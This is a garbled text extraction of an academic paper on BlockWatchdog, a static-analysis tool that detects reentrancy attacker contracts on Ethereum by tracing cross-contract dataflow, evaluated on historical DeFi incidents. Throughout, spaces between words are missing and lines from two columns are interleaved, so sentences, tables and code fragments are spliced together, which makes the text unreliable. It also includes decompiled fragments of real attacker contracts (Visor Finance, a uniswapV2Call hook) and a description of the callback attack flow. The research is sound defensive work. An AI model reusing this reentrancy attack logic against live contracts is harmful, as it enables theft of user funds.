types,suchasnewERCstandards[33](e.g.,reentrancycausedby 4 0x28e();} ERC721andERC1155[13]),oruser-definedinterfaces,e.g.,dele- 5 gateTransferERC20()inFigure1. 6 function 0x28e() private { Toaddresstheselimitations,amoregeneraldetectionmethod 7 require(_pool.code.size); 8 v0, v1 = _pool.deposit(0x52b7d2dcc80cd2e4000000, isneededtoreducebothfalsepositivesandfalsenegatives.Reen- address(this), _admin); trancyvulnerabilitiesaremainlycharacterizedbythemutualin- 9 require(v0); vocationofthevictimcontractandtheattackercontractwithcall- 10 require(RETURNDATASIZE() >= 32); backflowfeatures,butvictimcontractscontainlimitedandnon- 11 return ;} homogeneousinformation,makingitchallengingtosummarizea 12 13 function delegatedTransferERC20(address varg0, address genericsignatureforrule-basedtools.Itmotivatesustorecover varg1, uint256 varg2) public payable { reentrancyfeaturesfromtheattackercontractsperspective. 14 require(msg.data.length - 4 >= 96); 15 _count += 1; 3 ATTACKERSMARTCONTRACTSFOR 16 if (_count < 2) { 17 0x28e();}} REENTRANCY 18 } Inthissection,wepresentanempiricalstudyaimedatidentify- 19 // the source code of the victim contract ingthecharacteristicsofattackercontractsinvolvedinhistorical 20 contract RewardsHypervisor { 21 function deposit(uint256 visrDeposit, address payable reentrancyattacks.Ourgoalistouncoverreentrancyvulnerabili- from, address to) external returns (uint256 tiesthatexistingtoolshavemissed.Weapproachtheanalysisof shares) { attackercontractsthroughadatacollectionprocess,followedby 22 ... adataanalysisandfeatureidentificationprocess,asillustratedin 23 if(isContract(from)) { 24 require(IVisor(from).owner() == msg.sender); Figure2anddescribedinsubsequentsubsections. 25 IVisor(from).delegatedTransferERC20(address(visr), address(this), visrDeposit);} 26 else { 27 visr.safeTransferFrom(from, address(this), visrDeposit);} 28 vvisr.mint(to, shares);} 29 } Figure1:ReentrancyattacktowardVisorFinance. Figure2:Workflowoffindingnewreentrancytypes. 2.3 PriorResearchandTheirLimitations 3.1 DataCollection Unexploitableforthedetectedcontracts. Previousresearch hasfocusedondetectingreentrancyvulnerabilities,butmostof Togainacomprehensiveunderstandingofattacks,itisnecessaryto thecontractsdetectedareeithertoycontractswithnovalueor collectandanalyzerelevantdata.Webeganbysearchingforattack cannotbeexploitedbyattackers[35].Specifically,only1.98%of reportspublishedbyreputableblockchainsecurityfirmssuchas the23,327reportedvulnerablecontractsfromsixacademicprojects PeckShield,as wellas information fromsocial media platforms havebeenexploitedsincedeployment,affectingonly0.27%ofthe likeTwitterandpublishingplatformslikeMedium.Intotal,we fundsinthecontracts[16,21,23,28,32,48].Thereasonisthat identified281incidentsthatoccurredbetweenJune2016andJuly themajorityofEtherortokensareheldbyonlyasmallnumber 2022.Foreachreport,werecordedkeyinformationsuchasthe ofvulnerablecontracts,whicharelucrativeforhackers,making targetproject,thevictimcontractaddress,theattacktime,andthe mostofthedetectedcontractsunexploitable.However,detecting associatedlosses.Allthedatacollectedandtheirsourcelinksare
attackercontractscanhelpidentifytrulyexploitableyetvulnerable availableforpublicaccessinouropenrepository. contracts. 3.2 DataAnalysis Poorperformanceindetectingreentrancy.Existingreentrancy detectiontoolshaveanextremelyhighfalsepositiverate.More Attackercontractidentification. Aswedonotknowhowhack- than99.8%ofthereentrantcontractsdetectedbythetools[7,28, ersperformtheattack,weintendtofindtheattackercontractsto 29,39,48]arefalsepositives[60],asthesetoolsdonotdetectsome analyzetheattacklogicfromthecollecteddata.Specifically,two protectionpatterns,suchasthereentrancylock.Toreducefalsepos- ofourauthors,bothwithmorethantwoyearsofexperiencein itives,detectingattackercontractscanhelpfindthosehackerswho blockchainsecurity,manuallyanalyzedthe281incidentscollected aimattrulyexploitablecontractswithoutreentrancyprotections. using the open card sorting approach [43]. During the manualICSE2024,April2024,Lisbon,Portugal ShuoYang,JiachiChen,MingyuanHuang,ZibinZheng,andYuanHuang check,weidentifiedtwodistincttypesofattacks:thosedirectly theattackercontractautomaticallyexecutesandinitiatesexternal attackedbyexternallyownedaccounts(EOAs)ofhackersandthose callstothevictimcontracts.Notably,inreentrancyattacks,the attackedbyattackercontractsthathackersdeployed. attackercontractcanpassparameterstovictimcontracts,which makesthemcallbacktotheattackercontractagain,andtherecan Table1:AttackTypesObtainedfromCollectedData bemultiplevictimsinthiscallchain.AsshowninFigure3,wesum- marizethreetypesofreentrancybasedonthefunctionsutilizedby DoS BR IO RE IA CI CAD FL Others attackercontractstoperformreentrancy,i.e.,(1)fallback(),poor AC/EOA designswhenusing(2)ERCtokens,or(3)user-definedinterfaces. CA Specifically,theattackercontractcanimplementreentrancylogic (cid:71)(cid:35) (cid:32) (cid:35) (cid:32) (cid:35) (cid:35) (cid:35) (cid:32) (cid:71)(cid:35) (cid:47) (cid:47) (cid:47) (cid:47) (cid:47) (cid:47) (cid:47) (cid:47) (cid:47) inthefallback()functionwhenreceivingEthers.Itcanalsoinject callbacksintohookfunctionswhenusingERCtokens,e.g.,hook Wethenclassifytheattacktypesbasedonthenecessityofanat- tackercontractandtheavailabilityoftheattackercontract’ssource functiononERC721ReceivedwhenusingERC721,oruser-defined interfaces,e.g.,thecaseshowninFigure1,toimplementreentrancy. code.Table1showstheeighttypesofattackthatweidentified fromour281collectedincidents.Weusethe“Others”categoryto 3.3 AttackerContractFeatures coverattacksthattargetspecificdesignflawsofvictims,e.g.,infi- niteapprovaltovulnerablecontracts[37].The and symbolsin Figure4showsanexamplethatillustratesthehigh-levelfeatures thecolumn“AttackerContract”representattacktypesthatrequire ofthereentrancyattackfocusingonthecallflow.Toperformthe (cid:32) (cid:35) deployingtheattackercontract(AC)orusingEOAtransactions, reentrancyattack,theattackercontract(1)firstcallsthevictim respectively. The symbol represents attack typesthat do not contract(stepiinFigure4)tomakethevictiminvokeacallback requirethedeploymentofanattackercontractinsomecases.The (stepii)totheattacker’shookfunctionortransferEthertothe (cid:71)(cid:35) symbolinthe“CodeAvailability”(CA)columnrepresentsat- attackercontract(stepiii),(2)thentheattackercontractcallsthe tackercontractswhosesourcecodeisnotavailable.Amongthe281 victim again in the hook function or the fallback function, and (cid:47) samples,wefound31attackercontractsfrom28reports,classified reenters(stepiv)toinvokefunctionsthatcangenerateunfairprofits asDenialofService(DoS),BadRandomness(BR),Reentrancy(RE), (step v), (3) next, the profits can be transferred to the attacker Flashloan(FL),andOthers.AttackssuchasIntegerOverflow(IO), EOA (step vi) to complete the reentrancy attack. This call flow ImproperAuthentication(IA),CallInjection(CI),andCall-after- informationshowshowtheattackercontractinteractswiththe destruct(CAD),whichdonotinvolveattackercontracts,areout victimcontract.Thesummarizedthreetypesofreentrancyhelpus ofthescopeofouranalysis.Asthispaperfocusesonnewtypes identifythereentrancyfromfunction-levelcallinformation.The ofreentrancyvulnerabilitiesmissedbyexistingvulnerabilityde- designofourmethodshowninthefollowingsectionisbasedon tectiontools,wewillillustratereentrancyvulnerabilitiesfromthe thesefeaturesobtainedfromourempiricalstudy. perspectiveofthe18reentrancyattackercontractscollected. Figure3:Anoverviewofreentrancyattacks. Figure4:Anexampletoillustratereentrancyattack. Decompilationandunderstanding. Togainadeeperunder- 4 METHODOLOGY standingoftheattackerbehaviorsemployedbyreentrancyattacker contracts,wecollectedthebytecodeofattackercontractsforanaly- Inthissection,weintroducetheBlockWatchdogtool,whichcan sis,asnoneoftheidentifiedattackercontractsreleasedtheirsource detectattackercontractsthatperformreentrancyattacks.Wefirst
codetothepublic.WedecompiledtheEVMbytecodetorecovera giveanoverviewoftheapproachandthenprovidethedetailsfrom readableintermediaterepresentation(IR)oftheattackercontract. theperspectivesofflowinformationextraction,cross-contractstatic Wethenfollowedtheattackprocessanddescriptionaccordingto analysis,andattackercontractdetection. thereporttounderstandhowtheattackerimplementstheattack logicfromitsbytecode.Figure3providesanoverviewofhowat- 4.1 Overview tackercontractsexploitvictimcontracts.Thehackerfirstprograms BlockWatchdogconsistsofthreemaincomponents:Decompiler, theattackercontractanddeploysitontheblockchain.Subsequently, Cross-ContractDataflowAnalyzer,andAttackIdentifier.Figure5UncoverthePremeditatedAttacks:DetectingExploitableReentrancyVulnerabilitiesbyIdentifyingAttackerContracts ICSE2024,April2024,Lisbon,Portugal showsanoverviewoftheBlockWatchdogapproach.Thetoolcan decompilation,whichspecifieswhichfunctionscanbeinvoked acceptacontractbytecodeorarealaddressonEthereumasinput.If ineachexternalcall.Foreachexternalcallidentifiedinthecaller acontractaddressisprovided,thetoolretrievesthebytecodefrom contract,weobtainthecalleecontractandfunctionsignatureto theWeb3API[52].BlockWatchdogdecompilesthebytecodetothe locatethecalleesiteofthecontractbeingcalled,allowingustocon- IRandextractscriticalflowinformationfordataflowanalysisin structtheentirexCFGandxCGforinter-procedurecross-contract Decompiler.Next,theCross-contractDataflowAnalyzerconstructs analysis. thexCFGandxCGofthecontractaccordingtotheinformation Flowandexternalcallinformationextraction. Toextractthe obtainedfromthedecompilation.WeusexCFGandxCGtobridge flowinformationfromacontract,wefirstobtaineveryentrance theflowinformationofallcontractsinthecallchainsfortaint andexitofthecontract.Foreverypublicfunctionidentifiedbythe analysis.Taintsoriginatingfromtheattackercontractarepropa- decompiler,weextractitsfunctionargumentsandreturnparame- gatedthroughthefunctioncallargumentsandreturnsbasedon ters,whichdenotethestartandendpointsofthedataflowwithin designedtransferruleswhiletracingallpossiblecallchainsinthe thefunction,respectively.Functionargumentscanalsoflowtothe xCG.Finally,theAttackIdentifieridentifiesandreportsthethree parametersofexternalcallsmadewithinthefunction,whilethe attacktypesbasedonourdetectionpatternsbasedontheresultof returnvaluesofexternalcallscanflowbacktothefunction’sreturn thetaintflowanalysis. parameters.Therefore,wedesignfivedataflowrulesinTable2for ToimplementBlockWatchdog,weadoptapublicnodeprovided eachpublicfunctioninthecontract.Weillustrateeachrulebased byAlchemy[3]torequestdatafromtheblockchain.Specifically, onFigure6.TakingtheFuncArgToCallArgandFuncArgToCalleeas weusetheWeb3APIgetCodetofetchthebytecodeofacontract anexample,inFigure6,functionargumentv2ofthefunctionbar() andusegetStorageAt toobtainthestoragedatainaspecificslot (L2-L10)flowstotheargumentsoftheexternalcalltarget.foo()(L4) andoffsetfromacontractaccount.Fordecompilation,weusethe byruleFuncArgToCallArg.Incontracttarget,thefunctionargument EVMbytecodedecompilerElipmoc,whichimprovesoverallthe v1offoo()(L16-L22),whichissetbythecallercontractfrom(line notable past decompilers [17, 22]. Elipmoc can disassemble the (i)inFigure6),canflowtothecalleevariablev1ofthecalloper- EVMbytecodeintoEVMopcodesandconstructthecontrolflow ationv1.hook(v2)(L19)throughruleFuncArgToCallee(line(ii)in graphbasedonidentifyingflow-relatedopcodeslikeJUMPand Figure6).Bycombiningthesetworules,wecanobtaintheflow JUMPI. The function borders and the IR are then recovered for informationthataddress(this)(L4)setbycontractfromcanflow furtheranalysis. tothecalleevariablev1(L19)incontracttarget.Inthiscase,the contractfromcanmakethecontracttarget callitsimplemented functionhook throughthedataflowprocess.Then,thecallflow returnstothecontractfrom,whichmakesitcapableofcallingback tothetarget.foo()again(L12),andleadstothereentrancy. Table2:DataflowRulesinIntra-ProcedureAnalysis FlowType Meaning FuncArgToCallArg flowfromfunctionargumentstocallargu- ments FuncArgToFuncRet flowfromfunctionargumentstofunction returns Figure5:AnoverviewoftheapproachofBlockWatchdog. FuncArgToCallee flowfromfunctionargumentstocalleevari- ables 4.2 FlowInformationExtraction CallRetToCallArg flowfromcallreturnstocallarguments Whenanalyzinganinputcontract,thefirststepinBlockWatchdog CallRetToFuncRet flowfromcallreturnstofunctionreturns istodecompileitsEVMbytecodetotheIR.IntheDecompilercom- ponent,weextractflowinformationfromtheIRtoenabledataflow Additionally, we focus on whether the input contract imple- analysisandattackervectoridentification. ments an external call in the hook or fallback function, which Constantcontractaddressandfunctionsignatureidentifica- attackerscanleveragetomakeothercontractscallbackandsuc- tion. Toconductcross-contractstaticdataflowanalysis,weneed ceedinreenteringtheattackercontract.Wesummarizesixhook toidentifythetargetcontractsandfunctionsthattheinputcontract functionsfromfiveEthereumImprovementProposals(EIPs)[10] intendstocall.Basedonouranalysisofpreviousattackincidents, thatwefindtobeinvolvedinourcollectedreentrancyattacker
we observe that attacker contracts typically hard-code the con- contracts,asshowninTable3.Noticeably,welistthesehookfunc- tractaddresswithwhichtheywanttointeractorstorethetarget tionstoillustratethefeaturesoftheattackercontracts;ourBlock- contract’saddressinstorage.Therefore,weusethedecompilerto Watchdogdoesnotrelyonthesespecificfunctionsignaturesbut identifytheconstantvalue(conformingtoEIP-55[11])ofthecallee focusesonthecallflowfeatures.Furthermore,thefallbackfunc- contractaddress.Theslotnumberwithspecificoffsetstolocate tioncalledwhenreceivingEthersanduser-definedinterfaces,e.g., thestorageaddresscanbeobtainedthroughtheWeb3API getStor- IVisor.delegatedTransferERC20(),canalsobeusedtoperformreen- ageAt.Additionally,weidentifythefunctionsignaturesthrough trancy.Therefore,basedontheexternalcallinformationfoundinICSE2024,April2024,Lisbon,Portugal ShuoYang,JiachiChen,MingyuanHuang,ZibinZheng,andYuanHuang Algorithm1:Cross-contractStaticAnalysisforIdentifyingAttacks input:𝐶,theinputcontractbytecode output:𝐴𝐶←[],thelistofpossibleattackcallchains 1:𝐸 𝑓 ←𝑓𝑖𝑛𝑑𝐹𝑢𝑛𝑐𝑡𝑖𝑜𝑛𝑠𝑊𝑖𝑡ℎ𝐸𝑥𝑡𝑒𝑟𝑛𝑎𝑙𝐶𝑎𝑙𝑙(𝐶) 2:foreachfunction𝑓 ∈𝐸 𝑓 do 3: 𝑃𝑐 ←𝑠𝑒𝑎𝑟𝑐ℎ𝐶𝑎𝑙𝑙𝑃𝑎𝑡ℎ𝑠𝐵𝑦𝐷𝐹𝑆(𝑓) 4: 𝑠←𝑔𝑒𝑡𝑆𝑜𝑢𝑟𝑐𝑒(𝑓) 5: foreachpath𝑝∈𝑃𝑐do 6: 𝑡 ←𝑔𝑒𝑡𝑃𝑜𝑠𝑠𝑖𝑏𝑙𝑒𝑆𝑖𝑛𝑘(𝑝) 7: if𝑖𝑠𝑅𝑒𝑎𝑐ℎ𝑎𝑏𝑙𝑒(𝑠,𝑡,𝑟𝑢𝑙𝑒𝑠) 8: 𝐴𝐶←𝐴𝐶∪𝑝,𝑏𝑟𝑒𝑎𝑘 9:return𝐴𝐶 of the input contract. We obtain the bytecode of the interacted contractsbasedonthecontractaddressidentifiedduringdecompi- lation.Then,foreveryexternalcalloftheinputcontract,wefind thecall-targetcontractaddressandfunctionsignature.Basedon thetuple<callsite,caller_address,caller_funcSign,target_contract, target_funcSign>,wefindeverycallsitethatexecutestheCALL Figure6:Toycontractsforflowinformationillustration. opcodeanditscalltarget.WethenusetheDFSalgorithmtocon- structthexCFGandgatherallpossiblecallchainsoriginatingfrom thesetypesoffunctionsandflowinformationextractedduringthe thepublicfunctionsoftheinputcontracttoconstructxCGforthe intra-procedureanalysis,BlockWatchdogdetermineswhethera dataflowanalysis. reentrancyattackercontractispresent. 4.3.2 Cross-contractDataflowAnalysis. Wedefinethetaintedsource, sinksite,andtransferrulesinourdataflowanalysisforidentifying Table3:HookFunctionsDeclaredbyEIP attacksinTable4.ForacontractCanditsexternalcallf withargu- mentssetAintheexample,wedefineallexternalcallarguments𝐴 𝑠 Standard FunctionName FunctionSignature incontractCastainted.Then,foreverycontractcalled,wemark EIP-20 transferFrom 0x01c6adc3 everycalleevariablethatdeterminesthecalltargetaddress𝐶 as EIP-721 onERC721Received 0x150b7a02 𝑡 thesinksite.WeapplytherulesshowninTable2todetermine EIP-1155 onERC1155Received 0xf23a6e61 whetherthetaintedsourcecanflowtothesinksite.Ifthereisa EIP-777 tokensToSend 0x75ab9782 EIP-777 tokensReceived 0x0023de29 possiblepathforthatdataflowpath,itispossiblethattheinput EIP-1820 canImplementInterfaceForAddress 0x249cb3fa contractcanmakethecalledcontractcallaspecificaddressthatthe attackerdesigned,whichhelpsusfindwhetherthereisreentrancy. 4.3 Cross-contractStaticAnalysis Table4:DataflowRulesforIdentifyingAttackerContracts Inthissubsection,wedescribehowweusedecompiledintermediate representation(IR)andintra-procedureinformationtoconstruct C.f(A),f isanexternalcalltocontractC;Aisthe Example thexCFGandxCGoftheattackercontractanditsinteractingcon- setofarguments tracts.Algorithm1presentsanoverviewofhowtoidentifythe Source externalcallargumentsset𝐴 𝑠 ofinputcontract attackercontract.Wefirstconstructthecallchainofeverypub- Rules 5intra-proceduredataflowrulesinTable2 licfunctionthatcontainsanexternalcall𝐸 𝑓 usingtheextracted Sink callee𝐶 𝑡 ofexternalcallsincalledcontracts flowinformation(L1).Then,weusethedepth-firstsearch(DFS) algorithmforeachpublicfunction𝑓 tofinditsexternalcalltarget contractsandfunctionstoconstructthexCFGandxCG(L2-L3). 4.4 AttackerContractDetection Weapplythetaintedsourceidentificationrulestofindthetainted Inthissubsection,wepresentspecificrulesfordetectingreentrancy source𝑠 intheinputcontract’sfunction(L4).Then,weusesink attacksintheattackercontractusingflowinformationandcross- identificationrulesforeachcallchainintheconstructedxCGtofind contractdataflowanalysis. sensitivevariables𝑡thatcancausetheattack(L6),suchasfunction Thereentrancyattackcanbereflectedinthecallchainthatwe argumentsflowingtocalleevariables.Todeterminewhethercon- recoverbycross-contractstaticanalysis.Specifically,wedetectthe tractCcansuccessfullymaketheothercontractcallbacktoitself, attackercontractthatcanperformareentrancyattackinthree weusethetransferrulesfromsourcetosinktoobtainreachability steps.Step1:Wefirstdeterminewhetherthereisacallpaththat (L7)andfindpossibleattackcallchains. causestaintedvariablestoflowtothesinksiteusingtheruleswe 4.3.1 xCFGConstruction&CallChainGathering. Toperformstatic designedinthecross-contractanalysisillustratedinSection4.3.2. dataflowanalysis,wefirstneedtoconstructthexCGandxCFG Forexample,inFigure6,theattackercancallfunctionbar()(L2-L10)UncoverthePremeditatedAttacks:DetectingExploitableReentrancyVulnerabilitiesbyIdentifyingAttackerContracts ICSE2024,April2024,Lisbon,Portugal toinvokeexternalcalltarget.foo()(L16-L22).Thefunctionargument 5.2 AnswertoRQ1:EffectivenessontheGround
v1(L16)canflowtothecalleeoftheexternalcallv1.hook(v2)(L19) TruthDataset incontracttarget,whichmeanscontractfromcanmanipulatethe ToanswerRQ1,werunBlockWatchdogonourgroundtruthdataset calltargetofv1.hook().Wethenfindthetargetcallfunctionhook() with18attackercontractsfromourcollectedreports.BlockWatch- (L11-L12) of the reachable sink site v1.hook() (L19). Step 2: We dogcorrectlyreports15outof18reentrancyattackercontracts,as determine whether there is an implementation of the function showninTable5.Thesecondandthirdcolumnsshowthenameof hook()(L11-L12)oftheinputcontract,i.e.,contractfrom.Step3:If theDAppandthetimeitwasattacked;thefourthandfifthcolumns Step2istrue,wefindthecalltargetcontractaddressandfunction representthelossoftheattackandtheplatformtheDAppwas signaturetodeterminewhethertheyarevisitedinthecallpath, deployed.Columnssixthtoeighthshowtheaddressoftheexploiter, andjudgewhetherthereisareentrancyattack.Intheexample, theattackercontract,andthevictimcontractintheattack,respec- contractfromcallsbacktothefunctionfoo()againinthefunction tively.ThelastcolumndenoteswhetherBlockWatchdogcaniden- hook()toperformreentrancy. tifytheattackercontract.Itisnoticeablethatwefindtwoexploiters Weusethefollowingexpressiontodefinetheconditionsfora (0xceand0x80)intheCreamFinanceattackfromourcollected reentrancyattack.Wefirstfindthereachabilityofthesinksitein incidents,andthesetwoexploitersdeployed2(0xbdand0x38)and contracttar,whichcallsthefunctionf ofcontractto.Theaddress 1(0x32)attackercontracts,respectively,toattackthesamevictim ofcontracttocanbesetbytheattacker,whichisthetaintedsource contract(0xce).Similarly,theexploiter(0x61)thatattackedtheFei denotedby𝐴 𝑠.Furthermore,thefunctionf shouldbeimplemented protocolandRariDAppsdeployedtwoattackercontracts(0xE3 intheattackercontract’spublicfunctionlist𝐶 ,andtheexternal 𝐹 and0x32)toattackthevictimcontract(0xfb).WefindthatBlock- calls𝑓 ,includingthecalltargetaddressandfunctionsignature, 𝐸𝐶 Watchdogfailstoidentifythreereentrancyattackercontractsdue should be visited in the call path. If all conditions are met, we totworeasons.ThefirstfactoristheinabilityofBlockWatchdogto consideritareentrancyattack. recoverthecallchainwhenthecalltargetaddressesandfunctions intheattackercontractsareobtainedfrommemory.Giventhat thememoryvaluecannotbedeterminedviastaticanalysis,Block- 𝑅𝑒𝑎𝑐ℎ𝑎𝑏𝑙𝑒(𝑡𝑎𝑟,𝑓,𝑡𝑜), 𝑡𝑜 ∈𝐴 𝑠 Watchdogreliesontheconstantvalueofcalleeaddressesorcall 𝑅𝑒𝑒𝑛𝑡𝑟𝑎𝑛𝑐𝑦⇐ 𝑓 ∈𝐶 𝐹, 𝑓 𝐸𝐶 ∈𝑉𝑖𝑠𝑖𝑡𝑒𝑑 targetfunctionsignaturesforcompletecallchainrecovery.Inthe casesoftheFeiProtocolandRariincident,BlockWatchdogcannot identifythembecausethecalltargetcontractaddressisloaded 5 EVALUATION fromthememory.However,thememoryvaluecanonlybedeter- Inthissection,weevaluatetheeffectivenessofBlockWatchdog minedduringruntime,makingBlockWatchdogfailtodeducethe basedonthegroundtruthdatasetcollectedfromattackreports calltargetandrecoverthecallchain.Thesecondreasonpertains andalarge-scaledatasetobtainedthroughblockchaintransaction tothelimitationsinthefunctionsignatureidentificationofBlock- replay. Watchdog.SinceBlockWatchdogisbasedonElipmoc[17],which maynotbeabletorecoverallfunctionsignatures,thislimitation mayleadBlockWatchdogtofailtoidentifysomeexternalcalls.For 5.1 EvaluationSetup example,BlockWatchdogcannotdetectthereentrancyattackinthe TheexperimentwasconductedonaserverrunningUbuntu20.04.1 Spankchainincident,asthecalltargetfunctionLCOpenTimeout() LTS and equipped with 18 Intel(R) Core(TM) i9-10980XE CPUs isnotidentifiedinthevictimcontract.Asthedataflowprocedure @3.00GHzand250GBmemory. endswithanunknowntarget,BlockWatchdogfailstorecoverthe callchainandidentifythereentrancy.Despitesuchcases,therecall Dataset. WeusetwodatasetstoevaluateBlockWatchdog.The ofBlockWatchdogreaches83.3%inourexperiments. firstoneisthegroundtruthdataset,whichcomprisesreentrancy attackercontractsthatwecollectbyanalyzingtheattackincidents reports.Thisdatasetcontains18attackercontractsfrom15inci- dents.Thesecondlarge-scaleconsistsof421,889real-worldcontract bytecode(bothcreationandruntime).Thesecontractsareobtained 5.3 AnswertoRQ2:AttackerContracts viareplayingtransactionsfromblocknumber10millionto15.5 DetectioninaLarge-scaleDataset millionontheEthereummainnet. ToanswerRQ2,weranBlockWatchdogon421,889smartcontracts EvaluationMetrics. Wesummarizethefollowingresearchques- obtainedfromblockchaintransactionreplay.Theexperimentalre- tions(RQs)toevaluateBlockWatchdog. sultsshowthatBlockWatchdogreports253contractsasattacker contracts.WenextevaluatetheperformanceofBlockWatchdog, RQ1. HoweffectivelyisBlockWatchdogindetectingreentrancy usingamanuallabelingprocess.Twoauthorsmanuallyinspectthe attacksintheground-truthdataset? 253samplesreportedasattackercontracts,followingafour-step RQ2. HowistheperformanceofBlockWatchdoginfindingattacker procedure.Firstly,thedecompiledintermediaterepresentation(IR) contractsinthelarge-scaledataset? oftheattackercontractwasthoroughlyexamined.Secondly,the RQ3. Howmuchfinanciallossiscausedbytheidentifiedattacks, functionthatperformstheattackreportedbyBlockWatchdogis
andarevulnerabilitydetectiontoolsabletofindthosevul- located.Thirdly,thecallchainsreportedbyBlockWatchdogare nerablevictims? checked. Finally, based on these examinations, it is determinedICSE2024,April2024,Lisbon,Portugal ShuoYang,JiachiChen,MingyuanHuang,ZibinZheng,andYuanHuang Table5:AttackerContractsintheDatasetandDetectionResultsofBlockWatchdog(BW) # DApp AttackTime Loss($) Platform Exploiter AttackerContract VictimContract BW 1 Spankchain 2018/10/9 38K ETH 0xcf267eA3f1eb 0xc5918a927C4F 0xf91546835f75 × 2 Uniswap 2020/4/18 220K ETH 0x60f3FdB85B2F 0xBD2250D713bf 0x1f9840a85d5a ✓ 3 Lendf.Me 2020/4/19 24.7M ETH 0xa9bf70a420d3 0x538359785a8D 0x0eEe3E3828A4 ✓ 4 Akropolis 2020/11/12 2M ETH 0xe2307837524D 0x38c40427efbA 0x1cec0e358f88 ✓ 5 DeFiPie 2021/7/12 350K BSC 0xf6f43f77ef9e 0x6d741523F1Fc 0x607C794cDa77 ✓ 6 xSurge 2021/8/16 25M BSC 0x59c686272e6f 0x1514aaa4dcf5 0xE1E1Aa58983F ✓ 0xbd51Cb8c06F7 ✓ 0xce1f4b4f1722 7 CreamFinance 2021/8/31 5M ETH 0x38c40427efbA 0xce1f4b4f1722 ✓ 0x8036EbD0Fc9C 0x32d77947aACa ✓ 8 GrimFinance 2021/10/16 30M FTM 0xDefC385D7038 0xb08cCb39741d 0x279b2c897737 ✓ 9 VisorFinance 2021/12/21 8.2M ETH 0x8efab89b497b 0x10C509AA9ab2 0xc9f27a50f825 ✓ 10 Paraluni 2022/3/13 1.7M BSC 0xA386F30853A7 0x4770b5cb9d51 0x94bC1d555E63 ✓ 11 Agave&Hundred 2022/3/15 5.5M ETH 0xcE1F4B4F1722 0x38c40427efbA 0xf8D1677c8a0c ✓ 12 Revest 2022/3/27 120K ETH 0xef967ece5322 0xb480ac726528 0x2320a28f5233 ✓ 0xE39f3C40966D × 13 FeiProtocal&Rari 2022/4/30 80.3M ETH 0x6162759eDAd7 0xfbD8Aaf46Ab3 0x32075bAd9050 × 14 Omni 2022/7/10 1.4M ETH 0x00000000c251 0x3c10e78343c4 0x3c10e78343c4 ✓ 15 SushiBar 2022/10/25 15K ETH 0x8ca72f46056d 0x9C5A2A643152 0x2321537fd8EF ✓ whetheracontractisanattackercontract,andtheassociatedfinan- example, 19 attacker contracts were designed with attack logic ciallossisrecorded.Thelabeledresultsshowthat113samplesare to hack victim contracts, but these attempts failed, resulting in indeedattackercontractsthatperformreentrancyattacks. revertedtransactions.Mostofthesecontractsonlyhavetwotrans- Inthelarge-scaleexperiment,somemetricsarecollectedtohelp actions,i.e.,thecontractcreationtransactionandthefailedattack usevaluateBlockWatchdogmorecomprehensively.Forthestruc- transaction.Moreover,someexploitationfunctionnames,suchas ture of the constructed xCFG and xCG, the average number of Attack,Rugpull,Exploit,andTrigger,arecommonlyusedinattacker visitedcontractsandthecalldepthoftherecoveredxCGare0.95 contracts.Thisinterestingdiscoveryprovidesinformationforfunc- and0.21,respectively.Thesameindicatorsoftrueattackercontracts tion signature or name identification to find potential attacker are7.66and2.55,respectively.Thisindicatesthatmanyattacker contracts,andprovidesinsightsintothedevelopmentpreferences contractsdirectlyhardcodethevictimcontracts’addressesforim- ofhackers. plementingtheattack.Inaddition,theaveragedetectiontimefor Falsepositives. Weidentifytwotypesoffalsepositivesgenerated BlockWatchdogtoanalyzeanattackercontractis17.66seconds.An byBlockWatchdogwhendetectingreentrancyattackercontracts. attackercontractcaninteractwithamaximumnumberof105con- Thefirsttypeinvolvestheuseofgetterfunctionstomakeexternal tractsinasinglecallchain,withthemaximumcalldepthreaching callsinthereentranthookfunction,withoutperforminganyother 21.Suchdeepcallchainsinvolvingmultiplecontractsandfunctions profitableexternalcalloperations.Thesecondtypeinvolvesthe exposethelimitationsofsimplepattern-basedrulesincovering usageofapermissioncheckmechanism,wheresomecontracts complexreentrancyattacks. usemsg.sender asthetransfertargetortoconstrainthecallerof thehookfunction,withnointentionofmakingexternalcallsto Table6:Top5HookFunctionsandCallTargetFunctionsin attackothers.BlockWatchdogreportsallcasesbasedonthereen- IdentifiedAttackerContractswithOccurrenceTimes trancypathtominimizefalsenegatives,whichmaygeneratefalse positives. HookFunction Times CallTarget Times uniswapV2Call 73 balanceOf 111 5.4 AnswertoRQ3:FinancialLossofVictims onFlashLoan 13 transfer 102 Duringthelabelingprocess,wefoundthatthetotalfinancialloss onERC721Received 9 approve 53 causedbythetruepositiveattackswas908.4millionUSD.Thisloss delegatedTransferERC20 2 withdraw 25 comprisedapproximately840Ethers(about1.7millionUSD)andto- onERC1155Received 2 deposit 23 kensworth906.9millionUSD.Notably,thelossoftokensaccounted for99.8%ofthetotalfinancialloss,indicatingthatnewtypesof Table 6 shows the signatures of the call targets in the hook reentrancyattacksareprimarilycausedbypoordesignswhenusing
functionoftheattackercontractsfromourlabeleddataset.The andtransferringERCtokens,ratherthanEthertransfers. uniswapV2Call()isarequiredhookfunctioninUniswapV2[50], Table7showsthetop5attacksidentifiedbyBlockWatchdog, whileonFlashloan()isdeclaredbyERC3156[12].Wealsohavesome rankedbytheirfinancialloss.Wefindthatvulnerablecontractsmay interestingfindingsrelatedtothedesignofattackercontracts.For beattackedmultipletimesiftheyhavebeenexploitedsuccessfullyUncoverthePremeditatedAttacks:DetectingExploitableReentrancyVulnerabilitiesbyIdentifyingAttackerContracts ICSE2024,April2024,Lisbon,Portugal once.Specifically,BlockWatchdogidentified9,4,and3attacker areextractedbywhitehats,thussavingpossiblefinanciallosses.In contractsthatweredeployedtoattackprojectsCreamFinance[9], addition,BlockWatchdogtakes25secondstodetectthisattacker Omni[1],andVisorFinance[19],respectively,resultinginatotal contract(showninFigure1)andthepotentiallyexploitablevictim financiallossof906.7millionUSD.CreamFinancewashackedby inVisorFinance[19].Sincetheattackoccurredabout6minutes thehookfunctiontokensReceived()intheattackercontract.Itimple- afterthedeploymentoftheattackercontract,theprotectioncan mentsmultipletoken-borrowlogictoperformtheflashloanattack beperformedinthistimegap. inareentrancycallpath,whichdemonstratesthecomplexityofthe newtypesofreentrancyattacks.Omniwasattackedbyattacker contractsthatimplementedreentrancylogicinthehookfunction 1 function uniswapV2Call(address varg0, uint256 varg1, onERC721Received()whentransferringNFTs.Hackersrepeatedly uint256 varg2, bytes varg3) public nonPayable { minted,borrowed,andwithdrewNFTsbeforechangingtheliq- 2 v18, v19 = stor_18_0_19.call(0x2e236bc, address(this), 1, ...); uidationstate.VisorFinancewasexploitedbyattackercontracts 3 ... thatimplementeddelegatedTransferERC20(),whichisauser-defined 4 v39 = 